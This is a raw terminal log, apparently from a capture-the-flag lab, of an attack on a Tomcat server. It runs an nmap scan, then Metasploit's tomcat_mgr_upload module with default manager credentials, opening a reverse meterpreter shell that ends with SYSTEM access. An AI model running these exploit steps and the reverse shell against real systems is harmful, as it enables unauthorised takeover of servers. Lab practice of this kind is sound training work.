Nmap scan report for 10.10.10.95
Host is up (0.029s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/7.0.88
|_http-server-header: Apache-Coyote/1.1
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 105.84 seconds
msf6 exploit(multi/http/tomcat_mgr_upload) > options
Module options (exploit/multi/http/tomcat_mgr_upload):
Name          Current Setting  Required  Description
----          ---------------  --------  -----------
HttpPassword  s3cret           no        The password for the specified username
HttpUsername  tomcat           no        The username to authenticate as
Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS        10.10.10.95      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT         8080             yes       The target port (TCP)
SSL           false            no        Negotiate SSL/TLS for outgoing connections
TARGETURI     /manager         yes       The URI path of the manager app (/html/upload and /undeploy will be used)
VHOST                          no        HTTP server virtual host
Payload options (java/meterpreter/reverse_tcp):
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST  192.168.100.153  yes       The listen address (an interface may be specified)
LPORT  4444             yes       The listen port
Exploit target:
Id  Name
--  ----
0   Java Universal
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/tomcat_mgr_upload) > set lhost 10.10.14.9
lhost => 10.10.14.9
msf6 exploit(multi/http/tomcat_mgr_upload) > run
[*] Started reverse TCP handler on 10.10.14.9:4444
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying gCKIjVy9kOd0w7QUEbf83Foc...
[*] Executing gCKIjVy9kOd0w7QUEbf83Foc...
[*] Undeploying gCKIjVy9kOd0w7QUEbf83Foc ...
[*] Sending stage (58037 bytes) to 10.10.10.95
[*] Undeployed at /manager/html/undeploy
[*] Meterpreter session 1 opened (10.10.14.9:4444 -> 10.10.10.95:49192) at 2025-05-07 13:20:54 +0700
meterpreter > sysinfo
Computer : JERRY
OS : Windows Server 2012 R2 6.3 (amd64)
Architecture : x64
System Language : en_US
Meterpreter : java/windows
meterpreter > whoami
[-] Unknown command: whoami. Run the help command for more details.
meterpreter > shell
Process 1 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system
C:\apache-tomcat-7.0.88>